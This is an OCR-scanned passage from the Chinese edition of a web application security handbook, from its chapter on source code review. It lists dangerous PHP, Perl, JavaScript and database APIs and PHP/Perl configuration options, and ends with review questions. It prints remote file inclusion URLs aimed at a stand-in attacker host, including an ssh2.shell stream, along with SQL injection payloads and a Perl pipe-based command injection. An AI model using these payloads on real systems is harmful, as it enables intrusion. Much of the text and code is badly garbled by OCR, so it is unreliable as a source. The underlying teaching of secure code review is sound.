协 X 示 Ml 
HTTP, HTTPS http://wahh-attacker.com/bad.php 
FTP ftp://user:password@wahbh-attacker.com/bad.php 
SSH ssh2.shell://user:pass@wahh-attacker.com:22/xterm 


ssh2.exec://user:pass@wahh-attacker.com:22/cmd 


即使 alow_url_fopen 设 为 0， 攻 击 者 仍然 可 以 使 用 表 19-9 列 出 的 方法 
访问 远程 文件 〈 取 决 于 所 安装 的 扩展 ) 。 





表 19-9 allow_url fopen 设 为 0 时 仍然 可 用 于 访问 远程 文件 的 方法 


A i 示 例 
SMB \\wahh-attacker.com\bad.php 
PHP 输 入 /输出 流 php://filter/resource=http://wahh-attacker.com/bad.php 
RAG compress.zlib://http://wahh-attacker.com/bad.php 
Ft ogg://http://wahh-attacker.com/bad.php 
4 vA 


注解 PHP5.2 以 后 的 版 本 引入 了 一 个 新 的 选项 
allow_url_include， 默 认 情 况 下 ， 该 选项 被 禁用 。 这 个 默认 的 配置 
ee 的 方法 在 调用 文件 包含 函数 时 用 于 指定 一 个 远程 文 


2. 数据库 访问 
下 面 的 函数 用 于 回 数据 库 发 送 一 个 得 询 并 检查 碍 询 结果 : 
口 mysql_query 
口 mssql_query 
口 pg_query 
SQL 语 句 以 一 个 简单 的 字符 串 提 交 。 如 果 用 户 可 控制 的 数据 属于 字 
o 的 一 部 分 ， 那 么 应 用 程序 就 可 能 容易 受到 SQL 注入 攻击 。 例 
H: 


$username = “admin' or 1=1--"; 

Spassword = "foo"; 

$sql="SELECT * FROM users WHERE username = 'Susername' 
AND password = 'Spassword'"; 

$result = mysql_query ($sql, $link) 


amd 2 H 
ERATA RAH: 
SELECT * FROM users WHERE username = 'admin' or 1=1--' 
AND password = 'foo' 


下 面 的 函数 可 用 于 创建 预 处 理 语 句 ， 允 许 应 用 程序 建立 一 个 包含 参 
re irae ee eter eee 











D mysqli->prepare 
LJ stmt->prepare 

W stmt->bind_param 
LJ stmt->execute 

DQ odbc_prepare 


GOR Fc HG IE Fe KIAH, MALAI EAS Sy 52 BUSQLIEA BG. Bil 


$username = “admin' or 1=1--"*; 
S$Spassword = "foo"; 
$sql = $db_connection->prepare { 
"SELECT * FROM users WHERE username = ? AND password = ?")}; 
$sql->bind_param("ss", Susername, password); 
Ssql->execute(); 
e> ~ Ay Ake [二 
已 生成 的 查询 等 同 于 : 
SELECT * FROM users WHERE username = ‘admin'' or 1=1--' 
AND password = 'foo' 


3. 动态 代码 执行 
下 面 的 函数 可 用 于 动态 执行 PHP 人 代码; 
DQ eval 
DQ call_user func 
DQ call_user_func_array 
DQ call user method 
O call_user_method_array 
DQ create_function 








分 号 分 隔 符 用 于 将 几 个 语句 连接 在 一 起 。 如 果 问 这 些 函 数 提交 用 户 
可 控制 的 数据 ， 那 么 应 用 程序 可 能 易于 受到 脚本 注入 攻击 。 

搜索 与 蔡 代 正则 表达 式 的 preg_replace 函 数 ， 如 果 以 /e 选 项 调用 ， 可 
用 于 运行 一 段 特殊 的 PHP 人 代码。 如果 用 户 可 控制 的 数据 出 现在 动态 执行 
的 PHP 代 码 中 ， 应 用 程序 可 能 易于 受到 攻击 。 

PHP 的 另 一 个 有 趣 的 特点 在 于 ， 它 可 以 通过 一 个 包含 函数 名 称 的 变 
- hen ene eee en 
中 定 的 函数 : 


nhn 
<r pnp 
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这 时 ， 用 户 可 以 通过 修改 func 参 数 的 值 ， 使 应 用 程序 调用 任意 一 个 
函数 (没有 参数 ) 。 例 如 ， 调 用 phpinfo 函 数 将 使 应 用 程序 输出 大 量 与 
PHP 环 境 有 关 的 信息 ， 包 括 配置 选项 、 操 作 系 统 信息 与 扩展 。 

4. OS 命令 执行 
下 面 这 些 函 数 可 用 于 执行 操作 系统 命令 : 

LJ exec 

D passthru 

UD popen 

J proc_open 

O shell_exec 

口 system 

ORS C) 

所 有 这 些 命令 都 可 以 使 用 | 字符 链接 在 一 起 。 如 采 未 经 过 滤 就 问 这 
SPA SEACH AT EERIE, AB Bh ee MT MEE I AYRE Pe HAT A 
AMT o 

5. URLE K 

下 面 的 API 用 于 在 PHP 中 发 布 一 个 HTTP 重 定向 : 

口 http_redirect 

口 header 

口 HttpMessage::setResponseCode 

口 HttpMessage::setHeaders 

通常 ， 使 用 http_redirect 函 数 可 以 实现 一 个 重 定向 ， 该 函数 接受 一 个 
包含 相对 或 绝对 URL 的 字符 串 。 如 果 这 个 字符 串 的 值 由 用 户 控 制 ， 那 么 
应 用 程序 可 能 易于 受到 钓鱼 攻击 。 

通过 调用 包含 适当 Location 消 恩 涉 的 header 疯 数 也 可 以 实现 重 定 























问 ， 它 让 PHP 得 出 结论 ， 认 为 需要 一 个 HITP 重 定向 。 例 如 : 


header ("Location: /target.php"); 


还 应 仔细 审查 setResponseCode 与 setHeaders API 的 用 法 。 如 果 某 个 
重 定 向 包含 一 个 含有 HTTP Location 消息 头 的 3xx 响 应 ， 应 用 程序 就 可 能 
(E H IX EE A PIJAIT E E P o 
6. BRT 
下 面 的 API 用 于 在 PHP 中 建立 和 使 用 网 络 套 接 字 : 

DQ socket_create 

DQ socket_connect 

DQ socket_write 

DQ socket_send 

DQ socket_recv 

DQ fsockopen 

D pfsockopen 

使 用 socket_create 创 建 一 个 套 接 字 后 ， 再 通过 调用 socket_connect 与 
远程 主机 建立 连接 ; 这 个 API 接 受 目 标 主机 的 JP 与 端口 信息 为 参数 。 如 
果 用 户 能 够 以 某 种 方式 控制 这 些 主机 信息 ， 攻 击 者 就 可 以 利用 应 用 程序 
与 任意 主机 建立 网 络 连接 ， 无 论 这 些 主 机 位 于 公共 因特网 上 、 私 有 
DMZ 中 还 是 应 用 程序 运行 的 内 部 网 络 。 

fsockopen 与 pfsockopen 函 数 可 用 于 打开 连接 指定 主机 与 端口 的 套 接 
字 ， 并 返回 一 个 可 用 在 fwrite 和 fgets 等 标准 文件 函数 中 的 文件 指针 。 如 
ee 数据 ， 应 用 程序 就 可 能 易于 受到 攻击 ， 如 前 文 所 
Wo 














19.5.4 配置 PHP 环 境 


PHP 配 置 选 项 在 php.ini 文 件 中 指定 ， 访 文件 使 用 与 Windows INI 文 件 
相同 的 结构 。 有 各 种 选项 都 会 影响 一 个 应 用 程序 的 安全 。 最 新 版 的 PHP 
删除 了 许多 以 前 引起 问题 的 选项 。 

1. 使 用 全 局 变量 注册 

如 果 register_globals 指 令 被 激活 ，PHP 会 为 所 有 请 求 参数 建立 全 局 
变量 。 如 果 PHP 不 要 求 变 量 在 使 用 前 被 初始 化 ， 这 个 选项 就 会 导致 安全 
漏洞 ， 使 攻击 者 能 够 将 一 个 变量 初始 化 为 任意 一 个 值 。 

例如 ， 下 面 的 代码 检查 一 名 用 户 的 证 书 ， 如 果 证 书 有 效 ， 束 将 
$authenticated 变 量 值 设 为 1: 


if (check_credentials(Susername, $password) ) 


{ 
Sauthenticated = 1; 


if (Sauthenticated) 
f 
t 


因为 最 初 PHP 没 有 将 $authenticated 变 量 明 确 地 初始 化 为 0， 攻 击 者 就 
可 以 通过 提交 请 求 参数 authenticated=1 避 开 登 录 。 这 使 PHP 在 进行 证 书 
检查 之 前 就 将 全 局 变量 $authenticated 设 为 1。 





= 
“4 
=> 注解 从 PHP 4.2.0 开 始 ，register_globals 指 令 默认 被 禁用 。 
然而 ， Staal ey eI Ca alobals 执 行 的 正 TEE 
VE, 因此， ule ini 会 明确 激活 该 指令 。PHP 6 完全 删除 了 
register_globals 指 令 


2. 安全 模式 
如 果 safe_mode 指 令 被 激活 ， 那 么 PHP 会 对 使 用 某 些 危险 的 函数 施加 
限制 。 一 些 函 数 被 完全 禁 过 用 ， 其 他 一 些 函 数 的 使 用 也 受到 限制 ， 如 下 所 


ZN o 





口 Shell_exec 函 数 被 禁用 ， 因 为 这 个 函数 可 用 于 执行 操作 系统 命令 。 
口 mail 函 数 的 additional_parameters 参 数 被 禁用 ， T 如 果 以 不 安 
全 的 方式 使 用 这 个 参数 ， 可 能 导致 SMTP 注 入 漏洞 〈 请 参阅 第 10 章 了 解 
相关 内 容 ) 。 
口 F exec PA X f E 够 执行 safe_mode_exec_dir 指 定 目 标 下 的 可 执行 程 
序 ， 命 令 字 符 串 中 的 元 字符 被 自动 转 义 。 








es 

4 

> 注解 ”并 非 所 有 的 危险 函数 都 受到 安全 模式 的 限制 ， 一 些 
限制 受到 其 他 配置 选项 的 影响 。 而 且 ， 有 各 种 方法 可 以 避 开 一 些 安 
全 模式 限制 。 安 全 模式 并 不 能 完全 解决 PHP 应 用 程序 中 的 安全 问 
jl. PHP 6 已 删除 安全 模式 。 


3. magic quotes 

如 果 激 活 magic_quotes_gpc 指 令 ， 那 么 请 求 参 数 中 包含 的 任何 单 引 
号 、 双 引号 、 如 果 
magic_gquotes_sybase 指 令 被 禁用 ， 那 么 PHP 束 会 用 一 个 单 引 号 转 义 所 有 
单 引 号 。 这 个 选项 则 在 保护 包含 不 安全 的 数据 库 调用 的 危险 代码 ， 以 防 
它 被 恶 总 的 用 户 输 入 利用 。 在 应 用 程序 的 代码 中 查找 SQL 注 入 漏洞 时 ， 
a quotes 是 否 被 激活 ， 因 为 它 会 影响 应 用 程序 处 理 输入 的 
方式 。 

使 用 magic quotes 并 不 能 防止 所 有 SQL 注入 攻击 。 如 第 9 章 所 述 ， 

入 一 个 数字 字段 的 攻击 并 不 需要 使 用 单 引 号 。 而 且 ， 各 果 其 中 包含 的 可 
ee neo 那么 仍 可 以 利用 这 些 数据 
实施 二 阶 了 

在 不 需要 任何 转 义 的 情况 下 处 理 数据 时 ， 激 活 magic quotes 选 项 可 
能 会 使 PHP 对 用 户 输入 进行 不 必要 的 人 修改， 导致 代 码 中 多 出 和 斜 线 ， 还 要 
使 用 stripslashes 函 数 删除 。 

在 必要 时 ， 一 些 应 用 程序 通过 addslashes 函 数 提交 参数 ， 自 行 对 相 
关 输 入 进行 转 义 。 如 未 PHP 配 置 激 活 了 magic quotes， 那 么 这 种 方法 就 会 
导 仅 双重 转 义 字符 ， 这 时 就 会 将 配对 的 和 斜 线 解 释 为 字面 量 反 斜 线 ， 潍 在 
恶意 字符 不 会 转 义 。 

由 于 magic quotes 选 项 的 局 限 性 与 不 规则 性 ， 建 议 禁 用 该 选项 ， 使 
用 预 处 理 语 句 安全 访问 数据 库 。 








注解 PHP 6 已 删除 magic quotes 选 项 。 
其 他 
ate 10 列 出 了 其 他 一 些 可 能 影响 PHP 应 用 程序 安全 的 配置 选项 。 


#219-10 其 他 PHP 配 置 选 项 


选 项 Hi 
allow_url_fopen 如果 禁用 ， 该 指令 阻止 一 些 文件 函数 访问 远程 文件 
《如 前 文 所 述 ) 


allow_url_include 如 果 禁 用 ， 该 指令 阻止 PHP 文 件 包 含 函 数 用 于 包含 
一 个 远程 文件 


display_errors 如 果 禁 用 ， 该 指令 阻止 PHP 向 用 户 浏 览 器 发 送 错误 
消息 。log_errors 与 error_ log 选 项 
可 在 服务 器 上 记录 错误 消息 ， 以 方便 诊断 错误 
file_uploads 如 果 激 活 ， 该 指令 将 导致 PHP 人 允许 通过 HTTP 上 传 文 
作 





upload_tmp_dir ”这 个 指令 可 用 于 指定 保存 上 传 的 文件 的 临时 目录 。 
该 指令 确保 不 会 将 敏感 文件 保存 在 任何 
用 户 都 可 访问 的 位 置 


19.6 Perl 


本 节 主 要 介绍 在 Perl 平 台 上 获取 用 户 提 交 的 输入 的 方法 、 与 用 户 会 
aS 存在 的 潜在 危险 的 API 以 及 与 平台 安全 相关 的 配置 选 
项 。 

众所周知 ，Perl 语 言 允 许 开 发 者 以 各 种 方式 执行 相同 的 任务 。 而 
且 ， 有 大 量 Perl 模 块 可 满足 不 同 的 需求 。 如 果 Perl 使 用 任何 不 常见 的 或 
所 有 权 模 块 ， 应 对 这 些 模 块 进行 仔细 审查 ， 确 定 它 们 是 否 使 用 了 任何 强 
大 的 或 危险 的 函数 ， 从 而 引入 应 用 程序 直接 使 用 这 些 函数 时 引入 的 相同 
漏洞 。 

CGI.pm 是 最 常用 于 创建 Web 应 用 程序 的 Perl 模 块 ， 当 对 用 Perl 编 写 
的 Web 应 用 程序 进行 代码 审查 时 ， 很 可 能 遇 到 这 个 模块 所 使 用 的 API。 




















表 19-11 列 出 了 CGI 查询 对 象 的 全 部 成 员 。 





表 19-11 用 于 获取 用 户 提 交 的 数据 的 CGI 得 询 成 员 


选 项 fii 述 
param 如 果 调 用 时 不 使 用 参数 ，param 返 回 请 求 中 所 有 参数 名 
param_fetch = PRAY WZ 
如 果 调 用 时 使 用 参数 名 称 ，param 返 回 该 请 求 参 数 的 值 
param_fetch 方 法 返回 一 个 命名 参数 数组 








Vars 它 返回 参数 名 称 与 值 之 间 的 散 列 映射 

cookie 使 用 cookie 函 数 可 设 定 和 检索 一 个 命名 cookie 的 值 

raw_cookie raw_cookie Ñ 201 |=] HTTP Cookie 消 息 头 的 全 部 内 容 ， 
但 不 进行 任何 解析 

self_url 这 些 函 数 返 回 当前 URL， 前 者 包含 所 有 查询 字符 串 

url 


query_string ”这 个 阔 数 返回 当前 请 求 的 查询 字符 串 
referer 这 个 函数 返回 HTTP Referer 消 息 头 的 值 
request_method 这 个 函数 返回 请 求 中 使 用 的 HTTP 方法 


user_agent 这 个 函数 返回 HTTP User_agent 消 息 头 的 值 
http 这 些 函 数 返 回 当前 请 求 中 的 所 有 HTTP 环 境 变量 列表 
https 


ReadParse 这 也 个 函数 返回 一 个 名 为 %in 的 数组 ， 其 中 包含 所 有 请 
求 参数 的 名 称 与 值 


19.6.2 ”会话 交互 


Perl 模 块 CGISession.pm 对 模块 CGI.pm 进 行 扩展 ， 为 会 话 奶 踪 与 数据 
存储 提供 支持 。 例 如 : 


$sq->session datal"MyName"=>param( "username"})); // store user's name 


print "Welcome * . $q->session_data("*MyName") ; // retrieve user's name 


19.6.3 ”潜在 危险 的 API 


这 一 节 介 绍 一 些 常见 的 Perl API。 以 危险 的 方式 使 用 这 些 API 可 能 


造成 安全 漏洞 。 
1. 文件 访问 
Perl 使 用 下 面 的 API 访 问 文件 : 
WJ open 
DQ sysopen 


open 函 数 用 于 读 取 或 写 入 指定 文件 的 内 容 。 如 果 以 文件 名 参数 提交 
用 户 可 控制 的 数据 ， ee a S 

另外 ， 如 果 文 件 名 参数 的 开头 或 结尾 为 管道 符 〈|) ， 那么 这 个 参数 
的 内 容 被 提交 给 一 个 shell 命 令 。 如 果 攻 击 者 g 够 注入 包含 管道 符 或 分 号 
之 类 的 shel] 元 字符 的 数据 ， 那么 他 们 束 可 以 执行 任意 命令 ， 例 如 AF 
面 的 代码 中 ， 攻 击 者 可 以 注入 $useraddr 参 数 ， 以 执行 系统 命 命令 : 


Suseraddr = Squery->param("useraddr"); 
open (MAIL, "| /usr/bin/sendmail $useraddr") ; 
print MAIL "To: Suseraddr\n"; 


2. 数据 库 访 问 

selectall _arrayref PA 数 用 于 辐 数 据 库 发 送 一 个 查询 ， 并 以 一 系列 数组 
的 形式 检索 得 询 结 末 。do 函 数 用 于 执行 一 个 查询 ， 并 返回 受 影响 的 行 的 
数量 。 在 这 两 个 函数 中 ，SQL 语 句 以 一 个 简单 的 字符 串 提交 。 





如 果 用 户 可 控制 的 数据 属于 字符 串 参 数 的 一 部 分 ， 那 么 应 用 程序 就 
HA ssc pees oe 


my Suse 2rname = 'admin' or i 
my $password = " 
my i “SELECT * FROM users WHERE username = ‘$username’ AND password = 
‘Spassword' 
my $result = $db connection->selectall arrayref ($sql) 
me A J 
会 执行 不 恨 查 询 : 
SELECT * FROM users WHERE username = 'ađmin' or 1=1--' 
AND password = 'foo' 


prepare 5jexecute K Bi FY H T° il) 22 PU BR A), TE EM 
个 包含 参数 占 位 符 的 SQL 但 询 ， 并 以 可 徘 而 且 类 型 安全 的 方式 设 定 这 些 
EOE 如 果 按 正常 的 方式 使 用 ， 这 种 机 制 就 不 易 受 到 SQL 注 入 攻 
U0: 








my $username = "admin' or 1=1--"; 

my $password = "foo"; 

my $sql = $db_connection->prepare("SELECT * FROM users 
WHERE username = ? AND password = ?"); 


$sql->execute($username, $password) ; 


它 生 成 的 查询 等 同 于 : 
SELECT * FROM users WHERE username = ‘admin'' or 1=1--' 
AND password = 'foo' 


3. 动态 代码 执行 

eval 可 用 于 动态 执行 包含 Perl 代 人 码 的 字符 串 。 分 号 分 阳 符 用 于 将 几 
个 语句 连接 在 一 起 。 如 果 向 这 个 函数 提交 用 户 可 控制 的 数据 ， 那么 应 用 
程序 可 能 易于 受到 脚本 注入 攻击 。 

4. OS 命令 执行 

下 面 这 些 函 数 可 用 于 执行 操作 系统 命令 

口 system 

LJ exec 

口 qx 

日 反 单 引号 C) 

所 有 这 些 命令 部 可 以 使 用 | 字符 链接 在 一 起 。 如 果 未 经 过 滤 就 回 这 

函数 据 交 用 户 可 控制 的 数据 ， 攻 击 者 束 可 以 在 应 用 程序 中 执行 任意 命 














ong 


5. URL 重 定向 

CGI 查询 对 象 成 员 之 一 的 redirect 函 数 接受 一 个 包含 相对 或 绝对 URL 
的 字符 串 ， 用 户 被 重 定向 到 该 UREL。 如 果 这 个 字符 串 的 值 由 用 户 控制 ， 
那么 应 用 程序 可 能 易于 受到 钓鱼 攻击 。 

6. BRT 

使 用 socket 创 建 一 个 套 接 字 后 ， 再 通过 调用 connect 在 它 与 远程 主机 
之 间 建 立 连接 ，connect 函 数 接受 由 目标 主机 的 卫 与 端口 信息 组 成 的 
sockaddr_ in 结构 。 如 果 用 户 能 够 以 某 种 方式 控制 这 些 主机 信息 ， 攻 击 者 
就 可 以 利用 应 用 程序 与 任意 主机 建立 网 络 连接 ， 无 论 这 些 主 机 位 于 因 特 
网 上 、 私 有 DMZ 中 还 是 在 应 用 程序 上 运行 的 内 部 网 络 内 。 


19.6.4 配置 Perl 环 幸 

Perl 提 供 一 个 污染 模式 ， 防 止 用 户 提 交 的 输入 被 传送 给 潜在 危险 的 
函数 。 通 过 以 下 方式 向 Perl 解 释 器 提交 -IT 标记 ， 可 在 污染 模式 下 执行 Perl 
程序 。 

#!/usr/bin/perl -T 

当 某 个 程序 在 污染 模式 下 运行 时 ， 解 释 器 会 追踪 该 程序 以 外 提交 的 
每 一 个 输入 ， 并 把 它 当 做 被 污染 的 输入 处理 。 如 果 男 一 个 变量 根据 一 个 
受 污 染 的 数据 分 配 它 的 值 ， 那 么 Perl 也 认为 它 受到 污染 。 例 如 : 




















Spath = "/home/pubs" # Spath is not tainted 

Sfilename = param("file"); # $filename is from request parameter and 
# is tainted 

Sfull_path Spath.$filename; # $full_path now tainted 


不 能 将 污染 的 变量 提交 给 一 系列 功能 强大 的 命令 ， 包 括 eval、 
system、exec 与 open。 要 在 敏感 操作 中 使 用 污染 的 数据 ， 就 必须 执行 一 
项 模式 匹配 操作 并 提取 匹配 的 子 字符 串 , “清洁 ”这 些 数据 。 例 如 : 


Sfull_ path =~ m/^([a-zA-21-9]+})$/; # match alphanumeric submatch 

# in $full_path 
Sclean_full_path = $1; # set $clean_full_path to the 

f £ixrst submatch 

# Sclean ful path is itainted 





ERA TS Geb cH Lill A EEFE A (ER A a ae H 
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如 果 一 个 表达 式 的 范围 过 于 宽泛 ， 并 提取 了 使 用 时 可 能 引起 问题 的 数 
据 ， 那 么 污染 模式 提供 的 保护 就 会 失效 ， 应 用 程序 仍然 易于 受到 攻击 。 








SEBEL, To RRR Sl Lil, EE URE R E fE BRE PE 
用 输入 的 数据 前 ， 必 须 对 所 有 输入 进行 适当 确认 。 它 不 能 保证 所 实施 的 
输入 确认 已 经 足够 全 面 。 


19.7 JavaScript 


由 于 客户 端 JavaScript 不 需要 任何 应 用 程序 访问 权限 即 可 访问 ， 因 
此 ， 任 何 时 候 都 可 以 执行 以 安全 为 中 心 的 代码 审查 。 这 类 审查 的 关键 在 
于 确定 客户 端 组 件 中 的 所 有 漏洞 ， 如 基于 DOM 的 XSS， 它 们 使 用 户 易 于 
受到 攻击 (请 参阅 第 12 章 了解 相关 内 容 ) 。 审 查 JavaScript 的 男 一 个 原因 
是 ， 这 样 做 有 助 于 了 解 客户 端 实施 了 哪些 输入 确认 ， 以 及 动态 生成 的 用 
户 界 面 的 结构 。 

必须 确保 检查 .js 文件 和 在 HTML 内 容 中 组 

入 的 脚本 。 

需要 重点 审查 的 是 那些 读 取 基 于 DOM 的 数据 以 及 写 入 或 以 其 他 方 
式 修 改 当前 文档 的 API， 如 表 19-12 所 示 。 














表 19-12 SRi F DOM% H] JavaScript API 


API fi 述 

document.location 这 些 API 可 用 于 访问 通过 专门 设计 的 URL 控 制 
document.URL 的 DOM 数 据 ， 因 而 攻击 者 
document.URLUnencoded 可 回 它 们 提交 专门 设计 的 数据 ， 攻 击 其 他 应 
document.referer 用 程序 用 户 

window.location 

document. write() 这 些 API 可 用 于 更 新 文档 的 内 容 并 动态 执行 
document.writeln() JavaScript 代 码 。 如 果 癌 这 些 
document.body.innerHtml API 提 交 攻 击 者 可 控制 的 数据 ， 他 就 可 以 在 受 
eval() 害 者 的 浏览 器 中 执行 任意 
window.execScript() JavaScript 代 码 


window.setInterval() 
window.setTimeout() 


19.8 2 AZ 


如 今 ，Web 应 用 程序 已 不 仅仅 使 用 数据 库 实现 数据 存储 。 今 天 的 数 
据 库 包含 丰富 的 编程 接口 ， 可 在 数据 库 层 执行 大 量 的 业务 逻辑 。 开 发 者 
频繁 使 用 数据 库 代 码 组 件 〈《 如 存储 过 程 、 触 用 器 和 用 户 定 义 的 函数 ) 完 
成 各 种 关键 任务 。 因 此 ， 当 审查 一 个 web 应 用 程序 的 源 代码 时 ， 必 须 将 
数据 库 中 执行 的 所 有 近 辑 包括 在 审查 范围 之 内 。 

数据 库 代 码 组 件 中 的 编程 错误 可 能 会 导致 本 章 描 述 的 各 种 安全 漏 
洞 。 但 现实 操作 中 应 当 留 意 两 种 主要 的 漏洞 。 首 先 ， 数 据 库 组 件 自 壬 可 
能 包含 SQL 注 入 漏洞 ， 其 次 ， 用 户 输 入 可 能 会 以 危险 的 方式 提交 给 潜在 
危险 的 函数 。 


19.8.1 SQI 注 入 
第 9 章 介 绍 了 如 何 使 用 预 处 理 语句 代 瞪 动态 SQL 语句 ， 以 防止 SQL 


注入 攻击 。 然 而 ， 即 使 在 整个 Web 应 用 程序 代码 中 正确 使 用 预 处 理 语 
句 ， 如 果 数 据 库 代 码 组 件 以 危险 的 方式 使 用 用 户 提交 的 输入 构造 得 询 ， 























SQL 注入 漏洞 也 依然 存在 。 
下 面 以 一 0 
CREATE PROCEDURE ow current orders 
e 0C) = N 
pe ARE @sal archer (4000 
SELECT @sql = 'SELECT id_num, searchstring FROM searchorders WHERE ' 
‘searchstring = ''* + @name + '""'; 
EXB 3sql)} 


即使 应 用 程序 将 用 户 提交 的 name 值 安全 传送 给 存储 过 程 ， 该 过 程 本 
身 也 会 直接 把 这 个 值 连接 到 一 个 动态 查询 中 ， 因 此 它 易 于 受到 攻击 。 

不 同 的 数据 库 平台 使 用 不 同 的 方法 动态 执行 包含 SQL 语 句 的 字符 
串 ， 如 下 所 示 。 

口 MS-SQL: EXEC 

W Oracle: EXECUTE IMMEDIATE 

O Sybase: EXEC 

口 DB2: EXEC SQL 

Bh SSL CH (SAL Of SCE eR AT ERAT. 如 果 将 
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=> 注解 在 Oracle 中 ， 存 储 过 程 默认 在 定义 者 权限 而 非 调 用 
者 权限 下 运行 (与 UNIX 中 的 SUID 程 序 相同 ) 。 因 此 ， 如 果 应 用 程 
序 使 用 一 个 低 权 限 账户 访问 数据 库 ， 并 且 使 用 DBA 账 户 建立 存储 过 
程 ， 那 么 攻击 者 就 可 以 利用 某 个 过 程 中 存在 的 SQL 注入 漏洞 提升 自 
己 的 权限 ， 并 执行 任意 数据 库 查 询 。 














存储 过 程 之 类 的 定制 代码 组 件 常 用 于 执行 不 常见 的 或 功能 强大 的 操 
Wer MA ADEE NIIT IN ARTE fE BT BR SCAG IAS H EU SG 
那么 根据 该 函数 的 功能 ， 这 样 做 可 能 会 导致 各 种 类 型 的 漏洞 。 例 如 ， 下 
面 的 存储 过 程 oa = ee oe 就 易于 受到 命令 注入 攻击 。 


Create import data (@loadfile rchar (25), @loaddir varchar (25) ) 





select @cmåstring = "“S$PATH/firstload " + @lcadfile + " " + @loaddir 


Ena 


如 果 以 不 安全 的 方式 调用 ， 下 面 的 函数 可 能 造成 危险 。 

口 MS-SQL 与 Sybase 中 功能 强大 的 存储 过 程 ， 使 用 它们 可 执行 命令 
问 注 册 表 等 。 

口 用 于 访问 文件 系统 的 函数 。 

口 连接 到 数据 库 以 外 的 库 的 用 户 定 义 的 函数 。 

口 可 访问 网 络 的 函数 ， 例如， 通过 MS-SQL 中 的 OpenRowSet 或 
Oracle 中 的 数据 库 链 接 。 





或 


< 
œ- 





19.9 ”代码 浏 谢 工具 


到 目前 为 止 ， 我 们 描述 的 代码 审查 方法 大 多 要 求 阅 读 源 代 码 ， 并 从 
中 搜索 表示 获取 用 户 输入 及 使 用 潜在 危险 的 API 的 模式 。 因 此 ， 为 进行 
有 效 的 代码 审查 ， 最 好 使 用 一 和 亚 智 能 工具 浏览 代码 ; 也 就 是 说 ， 该 工具 
能 够 理解 各 种 语言 使 用 的 代码 结构 ， 提供 与 特定 API 和 表达 式 有 关 的 上 
下 文 信息 ， 并 能 够 方便 地 进行 导航 。 

在 许多 语言 中 ， 可 以 使 用 某 种 开发 工作 室 ， n Studio, 
NetBeans 或 Eclipse。 还 有 各 种 一 般 性 的 代码 浏览 工具 ， 它 们 支持 各 种 语 
ie 并 且 可 进行 优化 ， 以 方便 阅读 代码 。Source Insight 是 我 们 首选 的 工 
具 ， 如 图 19-1 所 示 。 它 文 持 源 代码 树 浏览 ， 拥 有 强大 的 搜索 功能 ， 使 用 
一 个 预览 框 显示 与 任何 选中 的 表达 式 有 关 的 上 下 文 信息 ， 并 且 能 够 在 代 
码 之 间 快 速 导航 。 
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图 19-1 ”使 用 SourceInsight 搜 索 和 浏览 某 个 Web 应 用 程序 的 源 代码 


19.10 小结 


许多 在 测试 Web 应 用 程序 方面 拥有 实际 经 验 的 人 ， 对 于 审查 一 个 应 
用 程序 的 代码 并 直接 从 中 发 现 漏洞 ， 往 往 表现 出 不 合 间 理 的 妨 惧 。 对 于 
那些 没 做 过 程序 员 的 人 而 言 ， 产 生 这 种 恐惧 是 可 以 理解 的 ， 但 这 种 表现 
并 没有 合理 的 根据 。 任 何 熟悉 计算 机 的 人 ， 只 要 人 花 一 点 儿 投 资 ， 就 可 以 
拥有 足够 的 知识 与 信心 ， 进 行 有 效 的 代码 审查 。 当 审查 一 个 应 用 程序 的 
代码 时 ， 不 一 定 要 发 现 其 中 包含 的 “全 部 ”漏洞 ， 任 何人 在 亲手 进行 测试 
时 都 不 会 设 定 这 个 不 现实 的 目标 。 更 合理 的 做 法 是 ， 着 手 了 解 应 用 程序 
对 用 户 提交 的 输入 进行 了 哪些 关键 的 处 理 ， 认 清 一 些 表示 应 用 程序 可 能 
存在 漏洞 的 签名 。 这 样 ， 代 码 审查 才 可 以 与 大 家 更 加 熟悉 的 “ 黑 盒 ”测试 
方法 互 为 补充 ， 提 高 “ 黑 盒 ”测试 的 效 紊 ， 并 披露 完全 从 外 部 访问 应 用 程 
序 时 非常 难以 发 现 的 漏洞 。 





19.11 问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/ywahh 。 
C1) 列 出 3 种 可 在 源 代 码 中 找到 明确 签名 的 常见 漏洞 。 
ee 
5 Wi? 
(3) 以 下 两 个 执行 SQL 查 询 的 方法 都 使 用 了 用 户 提交 的 输入 : 


// method 1 
String artist = request.getParameter("*artist*}.replaceAll{*'*, 








rey 


String genre = request.getParameter ("genre") .replaceAll("'", 


String album request .getParameter("“album").replaceALL("'", "''"}; 
Statement s = conmnection.createStatement {}; 


s.executeQuery{"SELECT * FROM music WHERE artist = '" + artist + 


* AND genre = '* + genre + '* AND album = '" + album + "'"); 
// method 2 
String artist = request.getParameter ("artist"); 
String genre = request.getParameter ("genre"); 
String album = request.getParameter ("album"); 
Statement s = connection.prepareStatement ( 
"SELECT * PROM music WHERE artist = '" + artist + 


' AND genre = ? AND album = ?"j; 
s.setString(1, genre); 
s.setString(2, album); 


s.executeQuery |); 


哪 一 个 方法 更 加 安全 ， 为 什么 ? 

(4) 在 审查 一 个 Java 应 用 程序 代码 时 ， 首 先 要 检查 
HttpServletRequest.getParameter API 的 所 有 用 法 。 下 列 代码 引起 了 你 的 
注意 : 

private void setWelcomeMessage(HttpServletRequest request} throws 

ServletException 


{ 


String name = request.getParameter ("name"); 


if {name == null) 
name = "" 


m_welcomeMessage = “Welcome ”+ name +*!"; 








这 段 代 码 表示 应 用 程序 中 可 能 存在 什么 漏洞 ? 还 需要 进行 哪些 代码 
分 析 才 能 确定 应 用 程序 是 否 确实 易于 受到 攻击 ? 

(5) 假设 渗透 调试 员 正在 审查 一 个 应 用 程序 用 于 生成 会 话 令 牌 的 
机 制 。 相 关 代 码 如 下 : 


public class TokenGenerator 


{ 
private java.util.Random r = new java.util.Random(); 
public synchronized long nextToken({) 
{ 
long 1 = r.nextint(}; 
long m = r.nextInt(}; 
return 1 + (m << 32); 
} 
} 


应 用 程序 生成 的 会 话 令 牌 是 否 可 以 预测 ? 请 解释 理由 。 


r 


Web 应 用 程序 黑客 工具 包 


内 需要 使 用 一 个 标准 的 Web 浏 览 器 即 可 实施 一 些 针 对 Web 应 用 各 
序 的 攻击 ， 然 而 ， 绝 大 多 数 攻击 要 求 使 用 其 他 一 些 工具 。 许 多 这 样 的 工 
具 需 要 与 浏览 器 组 合 在 一 起 使 用 ， 以 扩展 的 形式 修改 浏览 器 自身 的 功 
能 ， 或 者 作为 外 部 工具 与 浏览 器 同时 运行 ， 并 修改 它 与 目标 应 用 程序 的 


交互 。 

